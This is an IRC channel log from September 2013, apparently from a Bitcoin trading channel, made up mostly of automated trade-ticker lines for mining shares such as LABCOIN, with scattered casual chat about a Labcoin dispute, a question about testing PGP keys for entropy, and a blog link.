09:59:13 BUT! i see the edward guy was here which is nice. Sep 14 09:59:24 [BTCTC] [LABCOIN] 93 @ 0.001733 = 0.1612 BTC [+] Sep 14 09:59:40 [BTCTC] [LABCOIN] 92 @ 0.001756 = 0.1616 BTC [+] Sep 14 09:59:58 [BTCTC] [DMS.MINING] 89 @ 0.002604 = 0.2318 BTC [-] Sep 14 10:00:25 [BTCTC] [BASIC-MINING] 1 @ 0.1259 BTC [-] Sep 14 10:01:41 [BTCTC] [LABCOIN] 40 @ 0.001738 = 0.0695 BTC [-] Sep 14 10:01:49 [BTCTC] [LABCOIN] 91 @ 0.001772 = 0.1613 BTC [+] Sep 14 10:02:45 [MPEX] [S.MPOE] 5013 @ 0.000909 = 4.5568 BTC [+] Sep 14 10:02:47 [MPEX] [S.MPOE] 4577 @ 0.00091 = 4.1651 BTC [+] Sep 14 10:03:08 [BTCTC] [LABCOIN] 50 @ 0.001768 = 0.0884 BTC [-] Sep 14 10:03:17 [BTCTC] [LABCOIN] 41 @ 0.001768 = 0.0725 BTC [-] Sep 14 10:03:18 [BTCTC] [LABCOIN] 91 @ 0.001769 = 0.161 BTC [+] Sep 14 10:03:19 [BTCTC] [LABCOIN] 40 @ 0.0018 = 0.072 BTC [+] Sep 14 10:03:57 [BTCTC] [LABCOIN] 630 @ 0.001826 = 1.1504 BTC [+] Sep 14 10:03:59 [BTCTC] [LABCOIN] 88 @ 0.001828 = 0.1609 BTC [+] Sep 14 10:04:00 [BTCTC] [LABCOIN] 96 @ 0.001843 = 0.1769 BTC [+] Sep 14 10:04:01 [BTCTC] [LABCOIN] 1 @ 0.001854 BTC [+] Sep 14 10:04:02 [BTCTC] [LABCOIN] 185 @ 0.001854 = 0.343 BTC [+] Sep 14 10:04:38 [BTCTC] [LABCOIN] 1 @ 0.001827 BTC [-] Sep 14 10:04:49 [BTCTC] [LABCOIN] 87 @ 0.001853 = 0.1612 BTC [+] Sep 14 10:04:50 [BTCTC] [LABCOIN] 13 @ 0.001854 = 0.0241 BTC [+] Sep 14 10:04:59 [BTCTC] [LABCOIN] 417 @ 0.001854 = 0.7731 BTC [+] Sep 14 10:05:00 [BTCTC] [LABCOIN] 98 @ 0.001857 = 0.182 BTC [+] Sep 14 10:05:02 [BTCTC] [LABCOIN] 630 @ 0.00187 = 1.1781 BTC [+] Sep 14 10:05:03 [BTCTC] [LABCOIN] 96 @ 0.001871 = 0.1796 BTC [+] Sep 14 10:05:04 [BTCTC] [LABCOIN] 97 @ 0.001885 = 0.1828 BTC [+] Sep 14 10:05:05 [BTCTC] [LABCOIN] 200 @ 0.001899 = 0.3798 BTC [+] Sep 14 10:05:06 [BTCTC] [LABCOIN] 97 @ 0.001899 = 0.1842 BTC [+] Sep 14 10:05:15 [BTCTC] [LABCOIN] 100 @ 0.001899 = 0.1899 BTC [+] Sep 14 10:05:36 [BTCTC] [LABCOIN] 86 @ 0.001887 = 0.1623 BTC [-] Sep 14 10:05:51 [BTCTC] [LABCOIN] 200 @ 0.001911 = 0.3822 BTC [+] Sep 14 10:06:01 [BTCTC] [LABCOIN] 200 @ 0.001911 = 0.3822 BTC [+] Sep 14 10:06:03 [BTCTC] [LABCOIN] 300 @ 0.001918 = 0.5754 BTC [+] Sep 14 10:06:23 [BTCTC] [LABCOIN] 73 @ 0.001918 = 0.14 BTC [+] Sep 14 10:06:24 [BTCTC] [LABCOIN] 40 @ 0.001926 = 0.077 BTC [+] Sep 14 10:06:26 [BTCTC] [LABCOIN] 95 @ 0.001933 = 0.1836 BTC [+] Sep 14 10:06:27 [BTCTC] [LABCOIN] 22 @ 0.00195 = 0.0429 BTC [+] Sep 14 10:06:28 [BTCTC] [LABCOIN] 1270 @ 0.001992 = 2.5298 BTC [+] Sep 14 10:07:03 [BTCTC] [LABCOIN] 85 @ 0.001902 = 0.1617 BTC [-] Sep 14 10:07:05 [BTCTC] [LABCOIN] 276 @ 0.00199 = 0.5492 BTC [+] Sep 14 10:07:06 [BTCTC] [LABCOIN] 98 @ 0.00199 = 0.195 BTC [+] Sep 14 10:07:06 [BTCTC] [LABCOIN] 1984 @ 0.001992 = 3.9521 BTC [+] Sep 14 10:07:07 [BTCTC] [LABCOIN] 150 @ 0.001992 = 0.2988 BTC [+] Sep 14 10:07:08 [BTCTC] [LABCOIN] 400 @ 0.001993 = 0.7972 BTC [+] Sep 14 10:07:10 [BTCTC] [LABCOIN] 152 @ 0.001996 = 0.3034 BTC [+] Sep 14 10:07:30 [BTCTC] [LABCOIN] 83 @ 0.001909 = 0.1584 BTC [-] Sep 14 10:07:41 [BTCTC] [LABCOIN] 83 @ 0.001909 = 0.1584 BTC [-] Sep 14 10:07:42 [BTCTC] [LABCOIN] 83 @ 0.00195 = 0.1619 BTC [+] Sep 14 10:07:44 [BTCTC] [LABCOIN] 200 @ 0.001992 = 0.3984 BTC [+] Sep 14 10:07:54 [BTCTC] [LABCOIN] 200 @ 0.001992 = 0.3984 BTC [+] Sep 14 10:08:06 [BTCTC] [LABCOIN] 200 @ 0.001992 = 0.3984 BTC [+] Sep 14 10:08:07 [BTCTC] [LABCOIN] 30 @ 0.001994 = 0.0598 BTC [+] Sep 14 10:08:08 [BTCTC] [LABCOIN] 218 @ 0.001996 = 0.4351 BTC [+] Sep 14 10:08:18 [BTCTC] [KENILWORTH] 100 @ 0.00171 = 0.171 BTC [+] Sep 14 10:08:32 [BTCTC] [LABCOIN] 32 @ 0.001992 = 0.0637 BTC [-] Sep 14 10:08:49 [BTCTC] [LABCOIN] 50 @ 0.001992 = 0.0996 BTC [-] Sep 14 10:09:04 [BTCTC] [LABCOIN] 30 @ 0.001996 = 0.0599 BTC [+] Sep 14 10:09:59 [BTCTC] [LABCOIN] 1000 @ 0.001993 = 1.993 BTC [-] Sep 14 10:10:13 [BTCTC] [LABCOIN] 263 @ 0.001993 = 0.5242 BTC [-] Sep 14 10:10:14 [BTCTC] [LABCOIN] 1737 @ 0.001996 = 3.4671 BTC [+] Sep 14 10:10:24 [BTCTC] [LABCOIN] 1497 @ 0.001992 = 2.982 BTC [-] Sep 14 10:10:42 [01:19] well that's what happens when you selftrade on store credit and ukyo doesn't cut you the same scammy deal. <-- wtf? what scammy deal have i done ? x.x Sep 14 10:10:58 no, exactly the opposite : you've NOT done it. Sep 14 10:11:45 oh, k Sep 14 10:11:55 i have been away the last few hours, trying to read on whats happened Sep 14 10:12:49 not every time i say a name it's bad news you know. sometimes it's positive. Sep 14 10:12:56 :P Sep 14 10:13:24 [BTCTC] [LABCOIN] 83 @ 0.001953 = 0.1621 BTC [-] Sep 14 10:13:26 [BTCTC] [LABCOIN] 83 @ 0.001954 = 0.1622 BTC [+] Sep 14 10:13:26 [BTCTC] [LABCOIN] 83 @ 0.001958 = 0.1625 BTC [+] Sep 14 10:13:27 [BTCTC] [LABCOIN] 70 @ 0.001993 = 0.1395 BTC [+] Sep 14 10:13:28 [BTCTC] [LABCOIN] 181 @ 0.001996 = 0.3613 BTC [+] Sep 14 10:13:30 i re-read it like 3 times trying to figure it out. "this is what happens" coupled with "and ukyo doesn't cut you the same deal" misreads :P Sep 14 10:14:22 forums are so bloated I cant even find wtf happened Sep 14 10:14:43 [BTCTC] [LABCOIN] 82 @ 0.001979 = 0.1623 BTC [-] Sep 14 10:14:44 [BTCTC] [LABCOIN] 37 @ 0.001996 = 0.0739 BTC [+] Sep 14 10:14:44 something about an update, pcb boards with no traces, and "you lied" Sep 14 10:15:18 [HAVELOCK] [AM100] 1 @ 0.02014 BTC [-] Sep 14 10:15:35 [BTCTC] [LABCOIN] 82 @ 0.001986 = 0.1629 BTC [-] Sep 14 10:15:38 [BTCTC] [LABCOIN] 82 @ 0.001996 = 0.1637 BTC [+] Sep 14 10:16:43 [BTCTC] [LABCOIN] 82 @ 0.001993 = 0.1634 BTC [-] Sep 14 10:16:44 [BTCTC] [LABCOIN] 5717 @ 0.002 = 11.434 BTC [+] Sep 14 10:17:18 [BTCTC] [LABCOIN] 50 @ 0.002 = 0.1 BTC [+] Sep 14 10:17:27 [BTCTC] [LABCOIN] 500 @ 0.002 = 1 BTC [+] Sep 14 10:17:58 [BTCTC] [LABCOIN] 82 @ 0.001996 = 0.1637 BTC [-] Sep 14 10:18:00 [BTCTC] [LABCOIN] 4918 @ 0.002 = 9.836 BTC [+] Sep 14 10:18:05 yeah well, that'd be labcoin Sep 14 10:18:39 [BTCTC] [LABCOIN] 82 @ 0.001997 = 0.1638 BTC [-] Sep 14 10:18:40 [BTCTC] [LABCOIN] 518 @ 0.002 = 1.036 BTC [+] Sep 14 10:18:43 asciilifeform is there some way to make a website where people can put in their pgp keys and they get tested for entropy quality/statistical weakness ? Sep 14 10:19:07 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [+] Sep 14 10:19:18 [BTCTC] [LABCOIN] 500 @ 0.002 = 1 BTC [+] Sep 14 10:19:44 [BTCTC] [LABCOIN] 25 @ 0.002 = 0.05 BTC [+] Sep 14 10:19:55 [BTCTC] [LABCOIN] 82 @ 0.001998 = 0.1638 BTC [-] Sep 14 10:19:56 [BTCTC] [LABCOIN] 798 @ 0.002 = 1.596 BTC [+] Sep 14 10:20:11 [BTCTC] [LABCOIN] 57 @ 0.002 = 0.114 BTC [+] Sep 14 10:20:53 [BTCTC] [LABCOIN] 81 @ 0.002029 = 0.1643 BTC [+] Sep 14 10:21:01 [HAVELOCK] [LABCO] 10 @ 0.0026 = 0.026 BTC [-] Sep 14 10:21:02 [HAVELOCK] [LABCO] 10 @ 0.00251 = 0.0251 BTC [-] Sep 14 10:21:05 [HAVELOCK] [LABCO] 430 @ 0.00250001 = 1.075 BTC [-] Sep 14 10:21:40 [BTCTC] [LABCOIN] 81 @ 0.002043 = 0.1655 BTC [+] Sep 14 10:21:55 [BTCTC] [LABCOIN] 3 @ 0.00205 = 0.0062 BTC [+] Sep 14 10:21:56 [BTCTC] [ACTIVEMINING] 2 @ 0.002931 = 0.0059 BTC [-] Sep 14 10:21:57 [BTCTC] [LABCOIN] 638 @ 0.00206 = 1.3143 BTC [+] Sep 14 10:21:58 [BTCTC] [LABCOIN] 1 @ 0.00215 BTC [+] Sep 14 10:21:59 [BTCTC] [ACTIVEMINING] 10 @ 0.00293 = 0.0293 BTC [-] Sep 14 10:22:01 [BTCTC] [LABCOIN] 14 @ 0.002156 = 0.0302 BTC [+] Sep 14 10:22:02 [BTCTC] [ACTIVEMINING] 31 @ 0.002905 = 0.0901 BTC [-] Sep 14 10:22:03 [BTCTC] [LABCOIN] 14 @ 0.002173 = 0.0304 BTC [+] Sep 14 10:22:03 [BTCTC] [ACTIVEMINING] 124 @ 0.002904 = 0.3601 BTC [-] Sep 14 10:22:04 [BTCTC] [LABCOIN] 14 @ 0.00219 = 0.0307 BTC [+] Sep 14 10:22:05 [BTCTC] [LABCOIN] 97 @ 0.002199 = 0.2133 BTC [+] Sep 14 10:22:06 [BTCTC] [LABCOIN] 25 @ 0.0022 = 0.055 BTC [+] Sep 14 10:22:07 [BTCTC] [LABCOIN] 15 @ 0.002207 = 0.0331 BTC [+] Sep 14 10:22:08 [BTCTC] [LABCOIN] 30 @ 0.002224 = 0.0667 BTC [+] Sep 14 10:22:09 [BTCTC] [LABCOIN] 31 @ 0.002241 = 0.0695 BTC [+] Sep 14 10:22:10 [BTCTC] [LABCOIN] 1 @ 0.00225 BTC [+] Sep 14 10:22:12 [BTCTC] [LABCOIN] 4000 @ 0.002252 = 9.008 BTC [+] Sep 14 10:22:13 [BTCTC] [LABCOIN] 587 @ 0.002289 = 1.3436 BTC [+] Sep 14 10:26:06 [BTCTC] [DMS.PURCHASE] 1 @ 0.01196 BTC [-] Sep 14 10:26:27 [BTCTC] [ACTIVEMINING] 60 @ 0.002903 = 0.1742 BTC [-] Sep 14 10:28:17 [BTCTC] [LABCOIN] 50 @ 0.002122 = 0.1061 BTC [-] Sep 14 10:30:52 [BTCTC] [LABCOIN] 77 @ 0.00215 = 0.1656 BTC [+] Sep 14 10:30:53 [BTCTC] [LABCOIN] 77 @ 0.00215 = 0.1656 BTC [+] Sep 14 10:30:54 [BTCTC] [LABCOIN] 46 @ 0.00215 = 0.0989 BTC [+] Sep 14 10:31:07 [BTCTC] [LABCOIN] 31 @ 0.00215 = 0.0667 BTC [+] Sep 14 10:31:08 [BTCTC] [LABCOIN] 77 @ 0.00215 = 0.1656 BTC [+] Sep 14 10:31:09 [BTCTC] [LABCOIN] 77 @ 0.00215 = 0.1656 BTC [+] Sep 14 10:31:11 [BTCTC] [LABCOIN] 77 @ 0.00215 = 0.1656 BTC [+] Sep 14 10:31:12 [BTCTC] [LABCOIN] 77 @ 0.002151 = 0.1656 BTC [+] Sep 14 10:31:13 [BTCTC] [LABCOIN] 77 @ 0.002153 = 0.1658 BTC [+] Sep 14 10:31:14 [BTCTC] [LABCOIN] 77 @ 0.00216 = 0.1663 BTC [+] Sep 14 10:31:14 [BTCTC] [LABCOIN] 9 @ 0.002289 = 0.0206 BTC [+] Sep 14 10:31:44 [BTCTC] [LABCOIN] 69 @ 0.002351 = 0.1622 BTC [+] Sep 14 10:31:53 [BTCTC] [BITVPS] 1 @ 0.002 BTC [+] Sep 14 10:32:12 [BTCTC] [LABCOIN] 545 @ 0.002127 = 1.1592 BTC [-] Sep 14 10:32:13 [BTCTC] [LABCOIN] 54 @ 0.002125 = 0.1148 BTC [-] Sep 14 10:32:15 [BTCTC] [LABCOIN] 33 @ 0.002124 = 0.0701 BTC [-] Sep 14 10:32:23 [BTCTC] [LABCOIN] 545 @ 0.002124 = 1.1576 BTC [-] Sep 14 10:32:25 [BTCTC] [LABCOIN] 123 @ 0.002124 = 0.2613 BTC [-] Sep 14 10:32:26 [BTCTC] [LABCOIN] 117 @ 0.0024 = 0.2808 BTC [+] Sep 14 10:32:27 [BTCTC] [LABCOIN] 69 @ 0.002402 = 0.1657 BTC [+] Sep 14 10:32:28 [BTCTC] [LABCOIN] 31 @ 0.002412 = 0.0748 BTC [+] Sep 14 10:32:28 [BTCTC] [LABCOIN] 30 @ 0.002431 = 0.0729 BTC [+] Sep 14 10:32:29 [BTCTC] [LABCOIN] 30 @ 0.00245 = 0.0735 BTC [+] Sep 14 10:33:14 [BTCTC] [LABCOIN] 30 @ 0.002402 = 0.0721 BTC [-] Sep 14 10:33:15 [BTCTC] [LABCOIN] 15 @ 0.002458 = 0.0369 BTC [+] Sep 14 10:33:32 [MPEX] [S.MPOE] 3696 @ 0.00090769 = 3.3548 BTC [-] Sep 14 10:35:42 [BTCTC] [LABCOIN] 58 @ 0.002127 = 0.1234 BTC [-] Sep 14 10:37:28 [BTCTC] [ASICMINER-PT] 2 @ 2.1 = 4.2 BTC [-] Sep 14 10:37:30 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] Sep 14 10:37:31 [BTCTC] [ASICMINER-PT] 8 @ 2.1 = 16.8 BTC [-] Sep 14 10:38:35 [BTCTC] [TAT.ASICMINER] 50 @ 0.02025 = 1.0125 BTC [+] Sep 14 10:38:44 [BTCTC] [LABCOIN] 229 @ 0.002388 = 0.5469 BTC [+] Sep 14 10:38:46 [BTCTC] [LABCOIN] 771 @ 0.00239 = 1.8427 BTC [+] Sep 14 10:40:16 [BTCTC] [LABCOIN] 145 @ 0.002387 = 0.3461 BTC [-] Sep 14 10:40:16 [BTCTC] [LABCOIN] 197 @ 0.002388 = 0.4704 BTC [+] Sep 14 10:40:35 [BTCTC] [LABCOIN] 197 @ 0.002388 = 0.4704 BTC [+] Sep 14 10:40:37 [BTCTC] [LABCOIN] 1 @ 0.002388 BTC [+] Sep 14 10:40:40 [BTCTC] [LABCOIN] 168 @ 0.002388 = 0.4012 BTC [+] Sep 14 10:41:27 [BTCTC] [LABCOIN] 99 @ 0.002352 = 0.2328 BTC [-] Sep 14 10:41:38 [BTCTC] [LABCOIN] 97 @ 0.002369 = 0.2298 BTC [+] Sep 14 10:41:46 [BTCTC] [LABCOIN] 3 @ 0.002352 = 0.0071 BTC [-] Sep 14 10:41:59 [BTCTC] [LABCOIN] 96 @ 0.002388 = 0.2292 BTC [+] Sep 14 10:42:09 [BTCTC] [LABCOIN] 96 @ 0.002386 = 0.2291 BTC [-] Sep 14 10:42:25 [BTCTC] [LABCOIN] 22 @ 0.002388 = 0.0525 BTC [+] Sep 14 10:42:26 [BTCTC] [LABCOIN] 73 @ 0.00239 = 0.1745 BTC [+] Sep 14 10:42:31 [BTCTC] [LABCOIN] 97 @ 0.00239 = 0.2318 BTC [+] Sep 14 10:42:33 [BTCTC] [LABCOIN] 59 @ 0.00239 = 0.141 BTC [+] Sep 14 10:42:34 [BTCTC] [LABCOIN] 40 @ 0.0024 = 0.096 BTC [+] Sep 14 10:43:11 [BTCTC] [LABCOIN] 128 @ 0.002398 = 0.3069 BTC [-] Sep 14 10:43:12 [BTCTC] [LABCOIN] 60 @ 0.0024 = 0.144 BTC [+] Sep 14 10:43:27 [BTCTC] [LABCOIN] 200 @ 0.0024 = 0.48 BTC [+] Sep 14 10:43:40 [BTCTC] [LABCOIN] 65 @ 0.0024 = 0.156 BTC [+] Sep 14 10:43:49 [BTCTC] [LABCOIN] 156 @ 0.0024 = 0.3744 BTC [+] Sep 14 10:44:03 [BTCTC] [LABCOIN] 3241 @ 0.0024 = 7.7784 BTC [+] Sep 14 10:47:01 [BTCTC] [LABCOIN] 9 @ 0.002165 = 0.0195 BTC [-] Sep 14 10:47:03 [BTCTC] [LABCOIN] 491 @ 0.002151 = 1.0561 BTC [-] Sep 14 10:47:17 [HAVELOCK] [XBOND] 1 @ 0.00118699 BTC [+] Sep 14 10:48:35 [BTCTC] [LABCOIN] 200 @ 0.00238 = 0.476 BTC [+] Sep 14 10:48:49 [BTCTC] [LABCOIN] 800 @ 0.00238 = 1.904 BTC [+] Sep 14 10:50:32 [BTCTC] [TAT.ASICMINER] 49 @ 0.02049 = 1.004 BTC [+] Sep 14 10:50:42 [BTCTC] [LABCOIN] 21 @ 0.002125 = 0.0446 BTC [-] Sep 14 10:51:02 [BTCTC] [LABCOIN] 543 @ 0.002125 = 1.1539 BTC [-] Sep 14 10:51:03 [BTCTC] [LABCOIN] 21 @ 0.002124 = 0.0446 BTC [-] Sep 14 10:51:05 [BTCTC] [LABCOIN] 77 @ 0.002123 = 0.1635 BTC [-] Sep 14 10:51:06 [BTCTC] [LABCOIN] 27 @ 0.002122 = 0.0573 BTC [-] Sep 14 10:51:07 [BTCTC] [LABCOIN] 77 @ 0.002122 = 0.1634 BTC [-] Sep 14 10:51:08 [BTCTC] [LABCOIN] 77 @ 0.002122 = 0.1634 BTC [-] Sep 14 10:51:08 [BTCTC] [LABCOIN] 69 @ 0.002122 = 0.1464 BTC [-] Sep 14 10:51:09 [BTCTC] [LABCOIN] 77 @ 0.002121 = 0.1633 BTC [-] Sep 14 10:51:10 [BTCTC] [LABCOIN] 77 @ 0.00212 = 0.1632 BTC [-] Sep 14 10:51:11 [BTCTC] [LABCOIN] 7 @ 0.002119 = 0.0148 BTC [-] Sep 14 10:51:13 [BTCTC] [LABCOIN] 77 @ 0.002118 = 0.1631 BTC [-] Sep 14 10:51:14 [BTCTC] [LABCOIN] 9 @ 0.002114 = 0.019 BTC [-] Sep 14 10:51:15 [BTCTC] [LABCOIN] 99 @ 0.002113 = 0.2092 BTC [-] Sep 14 10:51:16 [BTCTC] [LABCOIN] 7 @ 0.002112 = 0.0148 BTC [-] Sep 14 10:51:17 [BTCTC] [LABCOIN] 77 @ 0.002111 = 0.1625 BTC [-] Sep 14 10:51:18 [BTCTC] [LABCOIN] 9 @ 0.002097 = 0.0189 BTC [-] Sep 14 10:51:19 [BTCTC] [LABCOIN] 99 @ 0.002096 = 0.2075 BTC [-] Sep 14 10:51:19 [BTCTC] [LABCOIN] 9 @ 0.00208 = 0.0187 BTC [-] Sep 14 10:51:20 [BTCTC] [LABCOIN] 96 @ 0.002079 = 0.1996 BTC [-] Sep 14 10:51:21 [BTCTC] [LABCOIN] 9 @ 0.002063 = 0.0186 BTC [-] Sep 14 10:51:22 [BTCTC] [LABCOIN] 96 @ 0.002062 = 0.198 BTC [-] Sep 14 10:51:23 [BTCTC] [LABCOIN] 9 @ 0.002046 = 0.0184 BTC [-] Sep 14 10:51:24 [BTCTC] [LABCOIN] 95 @ 0.002045 = 0.1943 BTC [-] Sep 14 10:51:25 [BTCTC] [LABCOIN] 9 @ 0.002029 = 0.0183 BTC [-] Sep 14 10:51:26 [BTCTC] [LABCOIN] 98 @ 0.002028 = 0.1987 BTC [-] Sep 14 10:51:27 [BTCTC] [LABCOIN] 99 @ 0.002011 = 0.1991 BTC [-] Sep 14 10:51:28 [BTCTC] [LABCOIN] 8 @ 0.00201 = 0.0161 BTC [-] **** BEGIN LOGGING AT Sat Sep 14 19:57:56 2013 Sep 14 19:57:59 [BTCTC] [BTC-GROWTH] 2 @ 0.1009 = 0.2018 BTC [-] Sep 14 19:58:00 [BTCTC] [BTC-GROWTH] 27 @ 0.101 = 2.727 BTC [+] Sep 14 19:58:02 [BTCTC] [BTC-GROWTH] 21 @ 0.1014 = 2.1294 BTC [+] Sep 14 19:58:03 [BTCTC] [BTC-GROWTH] 1 @ 0.102 BTC [+] Sep 14 19:58:04 [BTCTC] [BTC-GROWTH] 40 @ 0.1024 = 4.096 BTC [+] Sep 14 19:58:05 [BTCTC] [BTC-GROWTH] 10 @ 0.1025 = 1.025 BTC [+] Sep 14 19:58:43 [BTCTC] [ACTIVEMINING] 1 @ 0.002751 BTC [+] Sep 14 19:58:44 [BTCTC] [ACTIVEMINING] 49 @ 0.00275 = 0.1348 BTC [-] Sep 14 19:58:56 [BTCTC] [ACTIVEMINING] 1 @ 0.00275 BTC [-] Sep 14 20:01:52 [BTCTC] [LABCOIN] 48 @ 0.002106 = 0.1011 BTC [-] Sep 14 20:02:03 [BTCTC] [LABCOIN] 52 @ 0.002105 = 0.1095 BTC [-] Sep 14 20:06:35 [HAVELOCK] [SMG] 1 @ 0.0002 BTC [-] Sep 14 20:06:38 [HAVELOCK] [SMG] 2 @ 0.0002 = 0.0004 BTC [-] Sep 14 20:06:54 [HAVELOCK] [AM100] 50 @ 0.02 = 1 BTC [+] Sep 14 20:07:15 [HAVELOCK] [AM100] 10 @ 0.02045 = 0.2045 BTC [+] Sep 14 20:07:37 [HAVELOCK] [AM100] 50 @ 0.02049999 = 1.025 BTC [+] Sep 14 20:08:02 [HAVELOCK] [AM100] 10 @ 0.02054 = 0.2054 BTC [+] Sep 14 20:08:21 [HAVELOCK] [LABCO] 20 @ 0.00228 = 0.0456 BTC [-] Sep 14 20:08:37 [HAVELOCK] [AM100] 100 @ 0.02055 = 2.055 BTC [+] Sep 14 20:09:42 [HAVELOCK] [AM100] 51 @ 0.020645 = 1.0529 BTC [+] Sep 14 20:12:59 [MPEX] [S.MPOE] 494 @ 0.00089344 = 0.4414 BTC [+] Sep 14 20:14:04 [HAVELOCK] [XBOND] 15 @ 0.001155 = 0.0173 BTC [-] Sep 14 20:14:08 [BTCTC] [LABCOIN] 48 @ 0.002112 = 0.1014 BTC [+] Sep 14 20:14:45 [BTCTC] [BTC-TRADING-PT] 1 @ 1 BTC [-] Sep 14 20:15:30 [BTCTC] [LABCOIN] 478 @ 0.002111 = 1.0091 BTC [-] Sep 14 20:16:09 [BTCTC] [LABCOIN] 478 @ 0.002114 = 1.0105 BTC [+] Sep 14 20:16:11 [BTCTC] [LABCOIN] 352 @ 0.002112 = 0.7434 BTC [-] Sep 14 20:16:12 [BTCTC] [LABCOIN] 2692 @ 0.002111 = 5.6828 BTC [-] Sep 14 20:16:41 [MPEX] [S.MPOE] 2700 @ 0.00089286 = 2.4107 BTC [-] Sep 14 20:17:26 [BTCTC] [LABCOIN] 286 @ 0.002111 = 0.6037 BTC [-] Sep 14 20:17:41 [BTCTC] [ACTIVEMINING] 50 @ 0.0028 = 0.14 BTC [+] Sep 14 20:17:43 [BTCTC] [ACTIVEMINING] 508 @ 0.002819 = 1.4321 BTC [+] Sep 14 20:17:44 [BTCTC] [ACTIVEMINING] 10 @ 0.002823 = 0.0282 BTC [+] Sep 14 20:17:44 [BTCTC] [ACTIVEMINING] 50 @ 0.00283 = 0.1415 BTC [+] Sep 14 20:17:46 [BTCTC] [ACTIVEMINING] 382 @ 0.00283 = 1.0811 BTC [+] Sep 14 20:17:52 http://www.urbandictionary.com/define.php?term=BFL&defid=7164551 Sep 14 20:17:54 Urban Dictionary: BFL Sep 14 20:18:36 also Sep 14 20:18:38 ;;ud inaba Sep 14 20:18:39 http://www.urbandictionary.com/define.php?term=Inaba | "inaba" someone who doesn't have a clue about what s/he is talking about, coming from 'inable', 'inability' use their brains before doing something... Sep 14 20:18:40 [BTCTC] [LABCOIN] 400 @ 0.002114 = 0.8456 BTC [+] Sep 14 20:18:41 Urban Dictionary: Inaba Sep 14 20:19:54 [BTCTC] [BASIC-MINING] 8 @ 0.1263 = 1.0104 BTC [+] Sep 14 20:19:56 [BTCTC] [BASIC-MINING] 7 @ 0.1264 = 0.8848 BTC [+] Sep 14 20:22:31 [BTCTC] [ASICMINER-PT] 3 @ 2.059 = 6.177 BTC [+] Sep 14 20:23:22 [BTCTC] [TAT.ASICMINER] 79 @ 0.01917 = 1.5144 BTC [+] Sep 14 20:30:48 [BTCTC] [TAT.ASICMINER] 100 @ 0.01917 = 1.917 BTC [+] Sep 14 20:31:34 [BTCTC] [BTC-GROWTH] 3 @ 0.1001 = 0.3003 BTC [-] Sep 14 20:33:12 [HAVELOCK] [DEALCO] 4 @ 0.0081 = 0.0324 BTC [-] Sep 14 20:34:01 [HAVELOCK] [DEALCO] 5 @ 0.008001 = 0.04 BTC [-] Sep 14 20:34:35 [HAVELOCK] [DEALCO] 31 @ 0.00800001 = 0.248 BTC [-] Sep 14 20:36:26 [BTCTC] [ASICMINER-PT] 1 @ 2.05 BTC [-] Sep 14 20:36:54 [BTCTC] [ASICMINER-PT] 1 @ 2.059 BTC [+] Sep 14 20:38:11 [BTCTC] [ACTIVEMINING] 10 @ 0.002761 = 0.0276 BTC [-] Sep 14 20:38:13 [BTCTC] [ACTIVEMINING] 25 @ 0.00276 = 0.069 BTC [-] Sep 14 20:38:14 [BTCTC] [ACTIVEMINING] 25 @ 0.00275 = 0.0688 BTC [-] Sep 14 20:40:20 [BTCTC] [ACTIVEMINING] 127 @ 0.002618 = 0.3325 BTC [-] Sep 14 20:40:22 [BTCTC] [ACTIVEMINING] 31 @ 0.002615 = 0.0811 BTC [-] Sep 14 20:40:23 [BTCTC] [ACTIVEMINING] 25 @ 0.002603 = 0.0651 BTC [-] Sep 14 20:40:24 [BTCTC] [ACTIVEMINING] 267 @ 0.002601 = 0.6945 BTC [-] Sep 14 20:40:33 [BTCTC] [ACTIVEMINING] 6 @ 0.002601 = 0.0156 BTC [-] Sep 14 20:42:16 [BTCTC] [LABCOIN] 1 @ 0.002201 BTC [+] Sep 14 20:42:50 [BTCTC] [ACTIVEMINING] 70 @ 0.00275 = 0.1925 BTC [+] Sep 14 20:42:50 [BTCTC] [ACTIVEMINING] 10 @ 0.002604 = 0.026 BTC [-] Sep 14 20:42:52 [BTCTC] [ACTIVEMINING] 127 @ 0.002603 = 0.3306 BTC [-] Sep 14 20:42:53 [BTCTC] [ACTIVEMINING] 293 @ 0.0026 = 0.7618 BTC [-] Sep 14 20:43:56 [BTCTC] [LABCOIN] 4 @ 0.002201 = 0.0088 BTC [+] Sep 14 20:43:57 [BTCTC] [LABCOIN] 200 @ 0.0022 = 0.44 BTC [-] Sep 14 20:45:04 [HAVELOCK] [XBOND] 10 @ 0.001155 = 0.0116 BTC [-] Sep 14 20:45:08 [HAVELOCK] [XBOND] 20 @ 0.00116 = 0.0232 BTC [+] Sep 14 20:45:16 [BTCTC] [LABCOIN] 1 @ 0.002245 BTC [+] Sep 14 20:45:56 [BTCTC] [LABCOIN] 1 @ 0.002244 BTC [-] Sep 14 20:49:41 [BTCTC] [ACTIVEMINING] 111 @ 0.002603 = 0.2889 BTC [+] Sep 14 20:49:42 [BTCTC] [ACTIVEMINING] 707 @ 0.0026 = 1.8382 BTC [-] Sep 14 20:49:44 [BTCTC] [ACTIVEMINING] 20 @ 0.0026 = 0.052 BTC [-] Sep 14 20:49:44 [BTCTC] [ACTIVEMINING] 12 @ 0.002536 = 0.0304 BTC [-] Sep 14 20:49:45 [BTCTC] [ACTIVEMINING] 49 @ 0.002535 = 0.1242 BTC [-] Sep 14 20:49:46 [BTCTC] [ACTIVEMINING] 122 @ 0.002512 = 0.3065 BTC [-] Sep 14 20:49:47 [BTCTC] [ACTIVEMINING] 1000 @ 0.002511 = 2.511 BTC [-] Sep 14 20:49:49 [BTCTC] [ACTIVEMINING] 1979 @ 0.00251 = 4.9673 BTC [-] Sep 14 20:50:56 [BTCTC] [LABCOIN] 16 @ 0.002244 = 0.0359 BTC [-] Sep 14 20:53:46 ping mircea_popescu Sep 14 20:53:54 are you tracking this pax dickinson thing? Sep 14 20:53:55 ye ? Sep 14 20:54:10 doesn't that name sound trolly to you ? Sep 14 20:54:13 [HAVELOCK] [XBOND] 11 @ 0.00116 = 0.0128 BTC [+] Sep 14 20:54:42 [BTCTC] [LABCOIN] 2 @ 0.002244 = 0.0045 BTC [-] Sep 14 20:54:53 i've been on the internet for a while, so everything sounds trolly to me Sep 14 20:55:09 have you read the Mencius piece on the topic? Sep 14 20:55:14 it's amusing what drags that guy out of bed. Sep 14 20:55:14 nope. Sep 14 20:55:35 http://unqualified-reservations.blogspot.com/2013/09/technology-communism-and-brown-scare.html Sep 14 20:55:37 Unqualified Reservations: Technology, communism and the Brown Scare Sep 14 20:55:44 very peripheral topics these. the mencius fellow still has to man up over a discussion > 1 year old, and some random guy in the trade press... Sep 14 